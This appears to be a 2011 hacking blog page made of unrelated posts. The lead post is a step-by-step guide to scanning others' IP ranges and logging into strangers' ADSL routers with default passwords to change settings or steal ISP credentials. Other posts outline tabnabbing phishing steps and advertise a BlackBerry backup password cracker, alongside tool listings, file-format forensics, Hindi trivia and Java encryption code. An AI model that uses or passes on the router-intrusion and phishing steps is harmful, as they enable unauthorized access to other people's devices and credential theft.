Search This Blog

Tuesday, January 11, 2011

How to Hack an Ethernet ADSL Router

Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.
Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.
Before you proceed, you need the following tool in the process
Angry IP Scanner
Here is a detailed information on how to exploit the vulnerability of an ADSL router.
Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.
Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.
Suppose your IP is 117.192.195.101, you can set the range something as 117.192.194.0 to 117.192.200.255 so that there exists atleast 200-300 IP addresses in the range.
 
Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selection enter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.
IP Scanner
I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools
 
Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.
IP Scanner
 
Step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.
Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below.
Router Settings Page
 
If you do not succeed to gain access, select another IP from the list and repeat the step-5. Atleast 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.
 

What can an Attacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings. So the victim has to reconfigure the router in order to bring it back to action.
 

The Verdict:

If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack.
Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.



Warning!
All the information provided in this post are for educational purposes only. Please do not use this information for illegal purposes.
Publishing By at No comments:

Matriux- Another powerfull distribution

Another security distribution consisting of a bunch of powerful, open source and free tools designated for penetration testing, ethical hacking, system administrators, information systems forensics, security testing and much more.
Tools included in this distro are:
- Reconnaissance
- DNS
+ HTTrack
- Scanning
- BATMAN-Tools
- Cisco
- Routing-Protocols
- Web-Scanners
- Gain Access (Attack Tools)
- Brute-Force
- Password
- Framework
- Fast-Track
- Inguma
- Metaspolit Framework 2
- Metaspolit Framework 3
- Radio
- Bluetooth
- Wireless 802.11
- Digital-Forensics
- Acquisition
- Analysis
- Debugger
- Tracer
- Leak-Tracer
Publishing By at No comments:

Darkjumper- Web vulnerability checker

This tool will try to find every website that host at the same server at your target Then check for every vulnerability of each website that host at the same server.

Get Darkjumper  5.8 here

Publishing By at No comments:

Tabnabbing: A New Type of Phishing Attack

The web is a generative and wild place. Sometimes I think I missed my calling; being devious is so much fun. Too bad my parents brought me up with scruples.
Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You’ve escaped the attackers. In fact, the time that wary people are most wary is exactly when they first navigate to a site.
What we don’t expect is that a page we’ve been looking at will change behind our backs, when we aren’t looking. That’ll catch us by surprise.

How The Attack Works

  1. A user navigates to your normal looking site.
  2. You detect when the page has lost its focus and hasn’t been interacted with for a while.
  3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.
  4. As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.
  5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.
Publishing By at No comments:

Smartphone Forensics: Cracking BlackBerry Backup Passwords



BlackBerry dominates the North American smartphone market, enjoying almost 40 per cent market share. A 20 per cent worldwide market share isn’t exactly a bad thing, too. The total subscriber base for the BlackBerry platform is more than 50 million users.
Today, we are proud to present world’s first tool to facilitate forensic analysis of BlackBerry devices by enabling access to protected data stored on users’ BlackBerries.
One of the reasons of BlackBerry high popularity is its ultimate security. It was the only commercial mobile communication device that was ever allowed to a US president: Barack Obama has won the privilege to keep his prized BlackBerry despite resistance from NSA. (On a similar note, Russian president Dmitry Medvedev was handed an iPhone 4 a day before its official release by no one but Steve Jobs himself. No worries, we crack those, too).



All data transmitted between a BlackBerry Enterprise Server and BlackBerry smartphones is encrypted with a highly secure AES or Triple DES algorithm. Unique private encryption keys are generated in a secure, two-way authenticated environment and are assigned to each BlackBerry smartphone user. Even more; to secure information stored on BlackBerry smartphones, password authentication can be made mandatory through the policies of a BlackBerry Enterprise Server (default, password authentication is limited to ten attempts, after which the smartphone's wiped clean with all its contents erased). Local encryption of all data, including messages, address book and calendar entries, memos and tasks, is also provided, and can be enforced via the IT policy as well. With the supplied Password Keeper, Advanced Encryption Standard (AES) encryption allows password entries to be stored securely on the smartphone, enabling users to keep their online banking passwords, PIN codes and financial information handy – and secure. If that’s not enough, system administrators can create and send wireless commands to remotely change BlackBerry device passwords, lock or delete information from lost or stolen BlackBerries.
Sounds pretty secure, does it? As always, there is the weakest link. With BlackBerry, the weakest link is its offline backup mechanism.
Backups are good. If you don’t do backups yet you definitely should. Any decent IT policy will mandate you to backup data at certain intervals. This is true not only for laptops, desktops or servers, but also for mobile devices and smartphones. A lost BlackBerry can definitely ruin your day without having a recent backup handy. How long will it take you to get everything back on your new BlackBerry? Count contacts, appointments, mail accounts and their settings, installed applications, photos, device preferences, etc. Backups offer a convenient way to reduce this time to just a few minutes.
Backups are also evil. They create a new instance of information that might be private or sensitive. It is easy to manage this information while it stays inside a secure device, and it might be a nightmare to manage it when it is out. Backup encryption is supposed to solve the problem. If you’re one of those guys with search warrants, I doubt that you like the idea of encrypting anything, BlackBerry backups included. At least if this isn’t your own backup.
Smartphone manufacturers provide software not only for syncing devices with desktop computers, but also for creating backups. For example, Apple iPhone users have iTunes. For BlackBerries, it is BlackBerry Desktop Software. According to the application manual:
The BlackBerry Desktop Software is designed to link the content and applications on your BlackBerry device with your computer.
You can use the BlackBerry Desktop Software to do the following tasks:
• synchronize your organizer data (calendar entries, contacts, tasks, and memos) and media files (music, pictures, and videos)
• back up and restore your device data
• manage and update your device applications
• transfer your device settings and data to a new BlackBerry device
• use your device as a modem to connect to the Internet from your computer
• manage multiple devices
• charge your device
Creating device backup is quite simple; again, following the manual:
To back up data that is in your built-in media storage, mass storage mode must be turned on.
1. Connect your BlackBerry device to your computer.
2. In the BlackBerry Desktop Software, click [Device] > [Back up].
3. Do one of the following:
• To back up all your device data, click [Full].
• To back up all your device data except for email messages, click [Quick].
• To select which types of device data to back up, click [Custom]. Select the check box next to the data you want to back up.
4. If your device includes built-in media storage and you want to back up data that is stored there, select the [Files saved on my built-in media storage] check box.
5. Do any of the following:
• To change the default name for the backup file, in the File name field, type a new name.
• To encrypt your data, select the [Encrypt backup file] check box. Type a password.
• To save your settings so that you are not prompted to set these options again when you back up your device, select the [Don't ask for these settings again] check box.
6. Click [Back up].
So when you restore the device from a backup, you will have to supply the same password you entered to create it (as if it’s not obvious).
Contrary to iPhone backups that consist of a collection of multiple files, BlackBerry backups are stored in a single file – either with .ipd (Windows version of BlackBerry Desktop) or .bbb (Mac version) extension. In fact, .bbb is simply a ZIP archive incorporating .ipd file inside.
Backup encryption uses AES with a 256-bit key. So far, so good. An AES key is derived from the user-supplied password, and this is where the problem arises.
In short, standard key-derivation function, PBKDF2, is used in a very strange way, to say the least. Where Apple has used 2’000 iterations in iOS 3.x, and 10’000 iterations in iOS 4.x, BlackBerry uses only one. Another significant shortcoming is that it’s BlackBerry Desktop Software that encrypts data, not the BlackBerry device itself. This means that the data is passed from the device to the computer in a plain, unencrypted form. Apple devices act differently; the data is encrypted on the device and never leaves it in an unencrypted form. Apple desktop software (iTunes) acts only as a storage and never encrypts/decrypts backup data. This is quite surprising since the BlackBerry platform is known for its unprecedented security, and we’ve been expecting BlackBerry backup protection to be at least as secure as Apple’s, which turned not to be the case.
What does that mean for us? We can run password recovery attacks on BlackBerry backups really fast – even without GPU acceleration we can go over millions of passwords per second. Here is the performance chart

In case these numbers don't give you much of a hint, here is the tip: if the password is 7 character long (a typical length) and contains only small letters or only capitals, it will take only about half an hour to recover the password on an Intel Core i7 CPU. And even if the password is composed of both uppercase and lowercase letters, the recovery will succeed in less than three days.
Of course, longer passwords will take more time, but the big question is: are you able to memorize longer passwords, or will you write them down?
Sorry, forgot to mention. To recover BlackBerry passwords, you'll need our Elcomsoft Phone Password Breaker (formerly "Elcomsoft iPhone Password Breaker" – sorry Apple, we've dropped an 'i' because not only iPhone backups are supported now, but your competitors as well. The abbreviated name remains EPPB for the time being).
And now some quick tips. First, not only brute-force attack is available: the dictionary attack (our favorite, especially when used with permutations) is there as well.
Second, once the password is recovered (or if you already know it), EPPB can decrypt the backup so that you can use it to restore the device or analyze its contents using any 3rd party mobile forensic tools like ABC Amber BlackBerry Converter.


By : Vladimir Katalov

Publishing By at No comments:

Scapy

Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can’t handle, like sending invalid frames, injecting your own 802.11 frames, combining technics (VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel, …), etc.

 Get Scapy 2.1.1 here
Publishing By at No comments:

Black Berry IPD Files

IPD Files Demystified
Black Berry handheld devices have long been a favorite of the corporate executive but now with the release of a more mainstream multimedia capable mobile device in the Pearl and an aggressive advertising campaign, the Black Berry is bound to become a more popular device with non corporate types as well.
This mini white paper discusses the structure of the Black Berry backup or IPD file for the forensic examiner.
The IPD What is it?
The Black Berry Desktop software creates a proprietary backup of the databases on the Black Berry Handheld. This file is by default named in the following fashion
Backup-(current date,time and year)-.ipd
The files also default to the user’s “My Documents” folder. This, of course, may be changed by a user. The IPD file itself is a database of the databases.
IPD STRUCTURE
Below is a graphic of the IPD file.

As you can see from the graphic the IPD file begins with Inter@ctive Pager Backup/Restore File. The examiner may find this to be of use in search strings to find hidden or unallocated files.
Following this “header” the structure follows as is shown in the graphic below.

Here we can see that we have an one byte line feed (x/OA) followed by an one byte version (x/02) and a two byte indicator of the number of data bases in the file (in the above case x/3F).
Finally the names of the Databases follow after a 1 byte separator (x/00).
DATABASE NAME STRUCTURE
The databases within the file are constructed as follows
  • Database name length 2 bytes the length includes terminating null
  • Database name As long as the name length above
This is illustrated in the following graphic

After the database name length and name the database follows the following structure
  • Database ID Two bytes zero based position in the list of DB name blocks
  • Record Length 4 bytes
  • Database version 1 byte
  • DatabaseRecordHandler 2 bytes
  • Record Unique ID 4 bytes
  • Field length #1 2 bytes
  • Field type #1 1 byte
  • Field data #1 As long as field length
  • Field length #m 2 bytes
  • Field type #m 1 byte
  • Field data #m As long as the field length
The database has a unique id that is followed by the record length and the record ID. Each record will have a variable number of fields (as shown in the table by field #1 …field #m) that have a structure of length, type and data.
This is illustrated in the below graphic

This short white paper attempted to show the structure of the Black Berry backup file commonly known as the IPD file. The IPD file can be loaded into a Black Berry simulator or third party software such as the Amber Black Berry Converter to extract evidence. Examiners are encouraged to do their own research and validation into the file.
CITATIONS
1. http://www.BlackBerry.com/developers/journal/jan_2006/ipd_file_format.shtm
Publishing By at No comments:

General Studies


  • भारत के तीन बड़े गेंहू  उत्पादक राज्य - उत्तरप्रदेश > पंजाब  > हरियाणा



  • विश्व के सर्वाधिक सिंचित क्षेत्र - भारत > चाइना



  • किस तारीख को दोपहर में  आपकी छाया सबसे छोटी होती है - २२ जून



  • स्टेनलेस स्टील में carbon होता है - ०.२५ %



  • धान के खेत से निकलने वाली गैस है - मीथेन



  • भारत में स्वेत क्रांती के जनक - वर्गीस  कुरियन



  • लछु महाराज - कत्थक



  • गिरिजा देवी - शास्त्रीय गायन



  • पंडित रविशंकर - सितार वादन 



  • किशन महाराज - तबला वादन



  • अमजद अली खान - सरोद वादन



  • शिवकुमार शर्मा - संतूर वादन



  • विलायत खान - सितार वादन



  • हरिप्रसाद चोरसिया  - बांसुरी वादन



  • भारतीय  दर्शन को षड्दर्शन कहा जाता है - संख्या  दर्शन - कपिल, योग - पतंजलि, न्याय दर्शन - गौतम, वैशेषिक दर्शन - कणाद, मिमंषा - जैमिनी, वेदान्त - भगवत गीता



    • Publishing By at No comments:

    RSA & AES in JAVA

    Listing 1. RSA Key Generator
    import java.io.FileOutputStream;
    import java.io.IOException;
    import java.io.ObjectOutputStream;
    import java.security.GeneralSecurityException;
    import java.security.KeyPair;
    import java.security.KeyPairGenerator;
    import java.security.SecureRandom;
    public class RSAKeyGenerator {
    private static final int KEYSIZE = 8192;
    public static void main(String[] args) {
    generateKey("RSA_private.key","RSA_public.key");
    }
    public static void generateKey(String privateKey, String publicKey) {
    try {
    KeyPairGenerator pairgen = KeyPairGenerator.getInstance("RSA");
    SecureRandom random = new SecureRandom();
    pairgen.initialize(KEYSIZE, random);
    KeyPair keyPair = pairgen.generateKeyPair();
    ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(publicKey));
    out.writeObject(keyPair.getPublic());
    out.close();
    out = new ObjectOutputStream(new FileOutputStream(privateKey));
    out.writeObject(keyPair.getPrivate());
    out.close();
    } catch (IOException e) {
    System.err.println(e);
    } catch (GeneralSecurityException e) {
    System.err.println(e);
    }
    }
    }




    Listing 2. Encryption Method
    public void encryptToOutputFile(String publicKeyFile, String inputFile, String outputFile) throws FileNotFoundException,
    IOException, ClassNotFoundException, GeneralSecurityException {
    KeyGenerator keygen = KeyGenerator.getInstance("AES");
    SecureRandom random = new SecureRandom();
    keygen.init(random);
    SecretKey key = keygen.generateKey();
    // Wrap with public key
    ObjectInputStream keyIn = new ObjectInputStream(new FileInputStream(publicKeyFile));
    Key publicKey = (Key) keyIn.readObject();
    keyIn.close();
    Cipher cipher = Cipher.getInstance("RSA");
    cipher.init(Cipher.WRAP_MODE, publicKey);
    byte[] wrappedKey = cipher.wrap(key);
    DataOutputStream out = new DataOutputStream(new FileOutputStream(outputFile));
    out.writeInt(wrappedKey.length);
    out.write(wrappedKey);
    InputStream in = new FileInputStream(inputFile);
    cipher = Cipher.getInstance("AES");
    cipher.init(Cipher.ENCRYPT_MODE, key);
    crypt(in, out, cipher);
    in.close();
    out.close();
    }



    Listing 3. Decryption Method
    public void decryptFromOutputFile(String privatecKeyFile, String inputFile, String
    outputFile) throws IOException, ClassNotFoundException,
    GeneralSecurityException {
    DataInputStream in = new DataInputStream(new FileInputStream(inputFile));
    int length = in.readInt();
    byte[] wrappedKey = new byte[length];
    in.read(wrappedKey, 0, length);
    // Open with private key
    ObjectInputStream keyIn = new ObjectInputStream(new FileInputStream(privatec
    KeyFile));
    Key privateKey = (Key) keyIn.readObject();
    keyIn.close();
    Cipher cipher = Cipher.getInstance("RSA");
    cipher.init(Cipher.UNWRAP_MODE, privateKey);
    Key key = cipher.unwrap(wrappedKey, "AES", Cipher.SECRET_KEY);
    OutputStream out = new FileOutputStream(outputFile);
    cipher = Cipher.getInstance("AES");
    cipher.init(Cipher.DECRYPT_MODE, key);
    crypt(in, out, cipher);
    in.close();
    out.close();
    }



    Listing 4. Key File Transformer
    import java.io.FileInputStream;
    import java.io.FileNotFoundException;
    import java.io.IOException;
    import java.io.ObjectInputStream;
    import java.security.GeneralSecurityException;
    import java.security.Key;
    /*
    * Private/Public Key File to Encoded Key Byte[]
    */
    public class KeyToByteArray {
    public static void main(String[] args) throws FileNotFoundException, IOException, ClassNotFoundException,
    GeneralSecurityException {
    /*
    * Define Arguments
    */
    ObjectInputStream keyIn = new ObjectInputStream(new FileInputStream("RSA_private.key"));
    Key privateKey = (Key) keyIn.readObject();
    keyIn.close();
    byte[] k = privateKey.getEncoded();
    System.out.println(privateKey.getFormat());
    System.out.println(k.length);
    for(int i = 0; i < k.length; i++) {
    System.out.print(k[i]);
    }
    System.out.println();
    System.out.println("Created byte[] of length : " + k.length);
    System.out.println("Convert byte[] to String : " + bytesToHex(k));
    System.out.println("---------------------------------");
    System.out.println();
    System.out.print("byte[] encPKe = { ");
    int j = 0;
    for (int i = 0; i < k.length; i++) {
    if(i == k.length-1)
    System.out.print("(byte)0x" + byteToHex(k[i]) + " ");
    else
    System.out.print("(byte)0x" + byteToHex(k[i]) + ", ");
    j++;
    if(j == 6) {
    System.out.println();
    j = 0;
    }
    }
    System.out.println("};");
    System.out.println();
    }
    public static String bytesToHex(byte[] data) {
    StringBuffer buf = new StringBuffer();
    for (int i = 0; i < data.length; i++) {
    buf.append(byteToHex(data[i]).toUpperCase());
    }
    return (buf.toString());
    }
    public static String byteToHex(byte data) {
    StringBuffer buf = new StringBuffer();
    buf.append(toHexChar((data >>> 4) & 0x0F));
    buf.append(toHexChar(data & 0x0F));
    return buf.toString();
    }
    public static char toHexChar(int i) {
    if ((0 <= i) && (i <= 9)) {
    return (char) ('0' + i);
    } else {
    return (char) ('a' + (i – 10));
    }
    }
    }




    Listing 5. Modified Encryption Method
    public void encryptWKf(byte[] encPk, String inputFile, String outputFile) throws FileNotFoundException, IOException,
    ClassNotFoundException, GeneralSecurityException { …



    Listing 6. Modified Decryption Method
    public String decryptWKf(byte[] encPk, String inputFile) throws IOException, ClassNotFoundException, GeneralSecurityException { …



    Listing 7. Modified Encryption Method 2
    public void encryptWKf(byte[] encPk, String in, String outputFile) throws FileNotFoundException, IOException,
    ClassNotFoundException, GeneralSecurityException { …



    Listing 8. PKCS8 Key Specifications
    // make key out of encrypted private key byte[]
    PKCS8EncodedKeySpec keySpec = new PKCS8EncodedKeySpec(encPk);
    KeyFactory keyFactory = KeyFactory.getInstance("RSA");
    PrivateKey privateKey = keyFactory.generatePrivate(keySpec);




    Listing 9. X509 Key Specifications
    // make key out of encrypted public key byte[]
    X509EncodedKeySpec keySpec = new X509EncodedKeySpec(encPk);
    KeyFactory keyFactory = KeyFactory.getInstance("RSA");
    PublicKey publicKey = keyFactory.generatePublic(keySpec);


    Source : Hacking Magazine
    Publishing By at 2 comments:
    Subscribe to: Posts (Atom)